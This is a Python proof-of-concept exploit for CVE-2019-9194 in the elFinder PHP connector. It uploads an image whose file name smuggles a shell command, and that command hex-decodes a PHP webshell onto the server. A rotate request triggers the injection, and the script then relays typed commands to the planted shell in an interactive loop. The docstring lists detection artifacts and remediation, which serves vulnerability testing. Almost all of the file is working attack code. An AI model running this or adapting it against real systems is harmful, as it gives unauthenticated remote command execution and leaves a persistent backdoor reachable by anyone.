#!/usr/bin/env python3
"""
CVE-2019-9194 - elFinder <= 2.1.47 Command Injection

Proof of concept for the command injection in the elFinder PHP connector.
The script uploads a JPEG whose *file name* carries shell metacharacters and
then requests an image rotation of that file. The visible flow implies the
connector places the stored file name on a shell command line during the
rotate operation (NOTE(review): the server-side code is not part of this
file - confirm against the elFinder source for the version under test).

Artifacts this script leaves on the tested host, useful as detection and
clean-up pointers:
  * an uploaded file whose name contains ``;``, ``|`` and ``>``
  * a GET to ``php/connector.minimal.php`` with ``cmd=resize`` and
    ``mode=rotate`` directly after the upload
  * a new ``SecSignal.php`` in the connector's ``php/`` directory, then
    requests to it carrying a ``c`` query parameter

Remediation: run an elFinder release newer than 2.1.47 and do not expose the
connector to unauthenticated clients.

Usage: python3 exploit.py http://TARGET
"""
import requests
import json
import sys

# Name of the PHP file the injected command writes on the target. It persists
# after the script exits and must be removed once verification is done.
SHELL_FILENAME = "SecSignal.php"

# Filename payload: injects command that writes a PHP webshell.
# The hex decodes to a one-line PHP file that hands the `c` query parameter
# to system(), i.e. an unauthenticated command runner.
# The leading "SecSignal.jpg;" and trailing "echo SecSignal.jpg" wrap the
# injected pipeline, presumably so the surrounding command still sees a
# file-name-like token on both sides - TODO confirm.
UPLOAD_FILENAME = (
    "SecSignal.jpg;"
    "echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a "
    f"| xxd -r -p > {SHELL_FILENAME};"
    "echo SecSignal.jpg"
)

# Minimal valid JPEG (source: https://github.com/mathiasbynens/small/blob/master/jpeg.jpg)
# The image content is benign; only the file name above carries the payload.
JPEG = bytes([
    0xFF,0xD8,0xFF,0xDB,0x00,0x43,0x00,0x03,0x02,0x02,0x02,0x02,0x02,0x03,0x02,0x02,
    0x02,0x03,0x03,0x03,0x03,0x04,0x06,0x04,0x04,0x04,0x04,0x04,0x08,0x06,0x06,0x05,
    0x06,0x09,0x08,0x0A,0x0A,0x09,0x08,0x09,0x09,0x0A,0x0C,0x0F,0x0C,0x0A,0x0B,0x0E,
    0x0B,0x09,0x09,0x0D,0x11,0x0D,0x0E,0x0F,0x10,0x10,0x11,0x10,0x0A,0x0C,0x12,0x13,
    0x12,0x10,0x13,0x0F,0x10,0x10,0x10,0xFF,0xC9,0x00,0x0B,0x08,0x00,0x01,0x00,0x01,
    0x01,0x01,0x11,0x00,0xFF,0xCC,0x00,0x06,0x00,0x10,0x10,0x05,0xFF,0xDA,0x00,0x08,
    0x01,0x01,0x00,0x00,0x3F,0x00,0xD2,0xCF,0x20,0xFF,0xD9,
])


def upload(url: str) -> str:
    """Upload the JPEG under the crafted file name and return its elFinder hash.

    Args:
        url: Base URL of the elFinder installation, without a trailing slash.

    Returns:
        The ``hash`` field of the first entry in the response's ``added`` list.

    Raises:
        requests.HTTPError: the connector answered with an HTTP error status.
        KeyError, IndexError: the JSON response has no ``added`` entry, which
            is what a rejected upload looks like to this function.
    """
    files = {"upload[]": (UPLOAD_FILENAME, JPEG, "image/jpeg")}
    data = {
        "reqid": "1693222c439f4",
        "cmd": "upload",
        # NOTE(review): looks like the hash of the first volume's root
        # directory - confirm for the installation under test.
        "target": "l1_Lw",
        "mtime[]": "1497726174",
    }
    # No authentication material is sent: the connector accepts the upload
    # from an anonymous client.
    r = requests.post(f"{url}/php/connector.minimal.php", files=files, data=data)
    r.raise_for_status()
    return json.loads(r.text)["added"][0]["hash"]


def img_rotate(url: str, file_hash: str) -> None:
    """Request a 180-degree rotation of the uploaded file.

    This is the request that triggers the injection: it is sent as a
    ``cmd=resize`` call with ``mode=rotate`` against the hash returned by
    :func:`upload`. The response is discarded and its status is not checked,
    so a failure here only becomes visible in :func:`shell`.

    Args:
        url: Base URL of the elFinder installation, without a trailing slash.
        file_hash: elFinder hash of the uploaded file.
    """
    params = {
        "target": file_hash,
        "width": "539",
        "height": "960",
        "degree": "180",
        "quality": "100",
        "bg": "",
        "mode": "rotate",
        "cmd": "resize",
        "reqid": "169323550af10c",
    }
    requests.get(f"{url}/php/connector.minimal.php", params=params)


def shell(url: str) -> None:
    """Check whether the PHP file was written and, if so, relay commands to it.

    An HTTP 200 for ``php/SecSignal.php`` is treated as proof that the
    injected command ran. Each line read from stdin is then sent as the ``c``
    query parameter and the response body is printed. Ctrl+C ends the loop
    and exits the process with status 0.

    The dropped file is not removed on exit; it stays reachable by anyone who
    knows the path until it is deleted from the target.

    Args:
        url: Base URL of the elFinder installation, without a trailing slash.
    """
    r = requests.get(f"{url}/php/{SHELL_FILENAME}")
    if r.status_code == 200:
        print("[+] Pwned!")
        print("[+] Interactive shell (Ctrl+C to exit)\n")
        while True:
            try:
                cmd = input("$ ").strip()
                if not cmd:
                    continue
                # Commands travel in the query string, so they end up in the
                # web server's access log for the tested host.
                out = requests.get(f"{url}/php/{SHELL_FILENAME}",
                                   params={"c": cmd})
                print(out.text.strip())
            except KeyboardInterrupt:
                print("\nBye!")
                sys.exit(0)
    else:
        print(f"[-] Shell not found (HTTP {r.status_code}). Target may not be vulnerable.")


def main() -> None:
    """Run the three stages in order: upload, rotate, then check for the file.

    Expects exactly one command-line argument, the base URL; a trailing slash
    is stripped. Prints usage and exits with status 1 otherwise.
    """
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} http://TARGET")
        sys.exit(1)
    url = sys.argv[1].rstrip("/")
    print("[*] Uploading malicious image...")
    file_hash = upload(url)
    print(f"[*] File uploaded, hash: {file_hash}")
    print("[*] Triggering command injection via image rotation...")
    img_rotate(url, file_hash)
    print("[*] Checking for webshell...")
    shell(url)


if __name__ == "__main__":
    main()